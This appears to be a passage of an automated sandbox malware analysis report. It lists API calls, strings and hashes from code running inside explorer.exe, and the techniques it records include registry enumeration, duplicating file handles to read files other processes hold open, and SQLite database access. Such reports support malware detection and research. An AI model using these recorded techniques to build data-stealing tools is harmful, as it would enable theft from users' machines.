                                                                                                                                                                                                                                • Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
                                                                                                                                                                                                                                • Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02D62EE4
                                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D62F54
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 02D62F62
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1066184869-0
                                                                                                                                                                                                                              • Opcode ID: 04ff86b13e57269d54d3071096e8b167be81480a8ef4a9b201001a50a0486978
                                                                                                                                                                                                                              • Instruction ID: 54350558b00b0e0c6478577bf3c6273adfaf3e1fb43c9bcb332c8263fb4a9dfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04ff86b13e57269d54d3071096e8b167be81480a8ef4a9b201001a50a0486978
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06018F31208250AB8B159F62DC1C97F7BAAEFC4350F10442DF849A2384CB35CC15DBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4175140541-0
                                                                                                                                                                                                                              • Opcode ID: 63fea6c74e4c6ea9ac94965d6eb13a708138bcdfe6d41b4ad4a8c7ccfde320b6
                                                                                                                                                                                                                              • Instruction ID: ee1dcf6136813616a5de324abfe5f9e04c2564306f37f96d7b66067b251bf186
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63fea6c74e4c6ea9ac94965d6eb13a708138bcdfe6d41b4ad4a8c7ccfde320b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC04C35E84201DBF6D12BE09C1D71D3718AF00756F009800E205853C0DB518C118A62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02D69FF8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 02D6A00E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                                              • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                                                                                              • API String ID: 10892065-982776804
                                                                                                                                                                                                                              • Opcode ID: 0e8de417b10e7bcd3a61ff6cbb097f93a4e9ce91373b7191133b0a1e7d5b219f
                                                                                                                                                                                                                              • Instruction ID: 6282160d8e146ead2307b116c210b23d4d47e6da5ba84c4574b97827d059c772
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e8de417b10e7bcd3a61ff6cbb097f93a4e9ce91373b7191133b0a1e7d5b219f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF0C272A44352BFE7205954AC8CFB7779CDB8878AF210819E986E6385E271EC01C630
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02D62E83,PathToExe,00000000,00000000), ref: 02D61B16
                                                                                                                                                                                                                                • Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
                                                                                                                                                                                                                                • Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02D61B40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                              • API String ID: 2162223993-2036018995
                                                                                                                                                                                                                              • Opcode ID: b0aeb83806a8fb200aa9d7f2d6698d6d9b76b99abd0f80ebd0a08d7ab6b65b38
                                                                                                                                                                                                                              • Instruction ID: de4b0598e7f0073aa762b019be76fb6b29ade7109f6cf104d8b3538602dda1ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0aeb83806a8fb200aa9d7f2d6698d6d9b76b99abd0f80ebd0a08d7ab6b65b38
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F0E92778065A67D711692ECC98E77369FDBC22E67260029F42DA3341EE12EC0166B4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 02D6A35F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                              • String ID: winSeekFile
                                                                                                                                                                                                                              • API String ID: 973152223-3168307952
                                                                                                                                                                                                                              • Opcode ID: f9fef59e9a42b2fb960df48bc0c0aadbd9c95342d880cc2f519a267f5dbb9a99
                                                                                                                                                                                                                              • Instruction ID: 270a6856aa5003bc2d360ffc766e76cbe38ad8e726f5ebfb096996b5c6d7df88
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9fef59e9a42b2fb960df48bc0c0aadbd9c95342d880cc2f519a267f5dbb9a99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0B431A54205AFE7119F64DC049BB77AAEB45321F248769F8A6D63C0EB30DD149BA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(05150000,00000000,?), ref: 02D69EB5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02D69ECD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                                                                                              • API String ID: 1279760036-667713680
                                                                                                                                                                                                                              • Opcode ID: 24934f3b823684ae8529363ec83691e9e93d35fcb94a8d068d82639aff044a3f
                                                                                                                                                                                                                              • Instruction ID: 42f1056b5d6683d6abc2340638ea94f5e723395b4225b8ca7fb8690fd0222615
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24934f3b823684ae8529363ec83691e9e93d35fcb94a8d068d82639aff044a3f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE08637A441127BD51226846C09F6BB765DB84B10F110415F94596341C270DC1187B1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(05150000,00000000,?), ref: 02D69EF8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • failed to HeapFree block %p (%lu), heap=%p, xrefs: 02D69F0E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                              • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                                                                                              • API String ID: 3298025750-4030396798
                                                                                                                                                                                                                              • Opcode ID: d15033e29c1644fcc54c0c92905bfe9d99d59ffd109b9141cf4d136bb9e7b714
                                                                                                                                                                                                                              • Instruction ID: 1429d90817d3ef55e48971e48b53db0bf3c1178b03b9c08430836df565d00935
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d15033e29c1644fcc54c0c92905bfe9d99d59ffd109b9141cf4d136bb9e7b714
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6D0C233548203BBE2011A50AC09F3BBB399F80B00F150809F50595296C3709C61AB31
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                                                                                              • Opcode ID: a1a83801607d7b4bd5c0049c090f8e1156736c25f33291fdaaf0a6390c55fc20
                                                                                                                                                                                                                              • Instruction ID: 12ec6e32bf241c51da0a8cbc14b558b51155828846ae692f7a5861a3d2cdefd0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1a83801607d7b4bd5c0049c090f8e1156736c25f33291fdaaf0a6390c55fc20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD0E261696631A6E5B6262EBC1CFB76E1CDF03ABAB140A14B41D953C4E224CC97C2E0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                                              • Opcode ID: 47bd27ae589bd8a1fd25aaa65b9c8d6a8c92feba6c7667af8575b6a0d28fcccf
                                                                                                                                                                                                                              • Instruction ID: e7a7808a4015005b18c671901825191c433b8d7411e1dc3a07537d5564e52941
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47bd27ae589bd8a1fd25aaa65b9c8d6a8c92feba6c7667af8575b6a0d28fcccf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A00275D90104DBDD4557A49A2DA1E371CF744742F104944724596145D96498148B61
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000018), ref: 02D612B5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryZero
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 816449071-0
                                                                                                                                                                                                                              • Opcode ID: fe8d90b1f892579500d70bbe1e8d317938869fb574582376096494138a97940a
                                                                                                                                                                                                                              • Instruction ID: 957bb4bb8944dbfe502f31b75c2b5de50386c1bc9cd0e88e9aa3169f36669a0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8d90b1f892579500d70bbe1e8d317938869fb574582376096494138a97940a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611E3B1E01209EFDB10DFA9E989ABEB7BCFB08241B104429F949E6340D730DD00CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,02D62C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D61BAA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 140ce724a16a7dd636391c6180e88c3d7a730eb80ba02525f05781e7d54b84c0
                                                                                                                                                                                                                              • Instruction ID: ddddfff598ca67b8fdda40b6a1602b8aca6573670e5f4ce98b2b73c04d85f858
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 140ce724a16a7dd636391c6180e88c3d7a730eb80ba02525f05781e7d54b84c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5D0A733D02432838964163C780846262605A0257831E0774FC19F33C0E324CC82C2C0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02D61684
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244384528-0
                                                                                                                                                                                                                              • Opcode ID: 817ee64db85dd3be36f23a3d5d163c6c0b35154e41de458f3bd1312776e1a802
                                                                                                                                                                                                                              • Instruction ID: 29457bd04ded8f0903f47fac628cc8999ec5af8aa055a70fef1c838e9c35f7ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 817ee64db85dd3be36f23a3d5d163c6c0b35154e41de458f3bd1312776e1a802
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BC08C30960231DFE7701A708C09B8A36D8AF097B2F060D29E0C59D2C0E2F48CC0CAA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,02D6158A), ref: 02D61056
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: b59802b5b4af5f878cedddd6934fb595d1eb8e1031f1d22cd31ea6f0fbe48cbd
                                                                                                                                                                                                                              • Instruction ID: 6f5a80daa6ce9ab1f9c30021e740bb7fe33552db75186c2a7697d2a9a1a1f6b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59802b5b4af5f878cedddd6934fb595d1eb8e1031f1d22cd31ea6f0fbe48cbd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16A001B1BD5200AAFD6A5762AE2BF252A289740B02F200644B309681C055E4A9108569
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,02D64A5B,?,?,00000000,?,?,?,?,02D64B66,?), ref: 02D61065
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                              • Opcode ID: a245156fdfc336a903c019ad33b129547009bd1c6e47ce84d2def3a06a0ad70f
                                                                                                                                                                                                                              • Instruction ID: 72ee9cb2a5983ee6a18c83be8c8f3a0aeeb4d8e3bf4249ee00070fb3d96faede
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a245156fdfc336a903c019ad33b129547009bd1c6e47ce84d2def3a06a0ad70f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BA00270ED0700E6EDB557205D1AF052718A740F41F2049447241A91C549A5E4548E58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 02D634C0
                                                                                                                                                                                                                                • Part of subcall function 02D633C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02D63401
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D634E9
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02D6351E
                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02D63541
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02D63586
                                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 02D6358F
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,File), ref: 02D635B6
                                                                                                                                                                                                                              • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 02D635DE
                                                                                                                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02D635F6
                                                                                                                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02D63606
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 02D6361E
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 02D63631
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02D63658
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02D6366B
                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D63681
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 02D636AD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02D636C0
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D636F5
                                                                                                                                                                                                                                • Part of subcall function 02D61C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CC0
                                                                                                                                                                                                                                • Part of subcall function 02D61C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CDA
                                                                                                                                                                                                                                • Part of subcall function 02D61C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CE6
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D63707
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                                                                                                              • String ID: File
                                                                                                                                                                                                                              • API String ID: 3915112439-749574446
                                                                                                                                                                                                                              • Opcode ID: 8691721f9e6c23dc7814416443f8b03a47e4ac4376bf0ba7266908dc06a7782f
                                                                                                                                                                                                                              • Instruction ID: 85436962f22d307b2baa95aaf949394391f7790ab2a3ede0235861473507bb57
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8691721f9e6c23dc7814416443f8b03a47e4ac4376bf0ba7266908dc06a7782f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC619B70A48340EFE761AF61CC98B3B7BADEB88B55F100828F946A6390D731DC54CB91
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 02DB4502
                                                                                                                                                                                                                              • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 02DB475F
                                                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 02DB4803
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                              • API String ID: 231171946-1096842476
                                                                                                                                                                                                                              • Opcode ID: 9ec56897687cc3e7671f63da9137627a614fc89a0fe83ecb28afad1737070184
                                                                                                                                                                                                                              • Instruction ID: 3132f16f36eca5dd736fc28c1b82b90d65b93fcee8423521ad85a4007fafc85a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ec56897687cc3e7671f63da9137627a614fc89a0fe83ecb28afad1737070184
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47C19E70A08391DBDB26CE2884B47EAB7E2AF89318F04051EE4D787352D764DC45CB92
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D66AAA: memset.NTDLL ref: 02D66AC5
                                                                                                                                                                                                                              • memset.NTDLL ref: 02D85F53
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                                                                                              • API String ID: 2221118986-594550510
                                                                                                                                                                                                                              • Opcode ID: ebbdfb9ea91fac004fc7d454f0db0863efc810f78f38fe1b1cc758749a00e33c
                                                                                                                                                                                                                              • Instruction ID: c06dc2b7d378c01ad8925e2ce1bd57f9e9c745d1b53e4d8f6ffa4b69d69f394c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebbdfb9ea91fac004fc7d454f0db0863efc810f78f38fe1b1cc758749a00e33c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76C16B70A087029FDB14EF25C480A2AB7EAFF88714F14896DF88587341E735ED56CB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02D62127
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,00989680,00000000), ref: 02D6213A
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D6214F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
